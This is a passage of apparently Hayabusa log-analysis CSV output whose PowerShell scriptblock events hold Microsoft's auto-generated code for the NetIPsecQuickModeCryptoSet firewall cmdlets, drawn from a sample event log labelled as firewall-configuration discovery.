Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 
${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder =",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microso",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.020 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
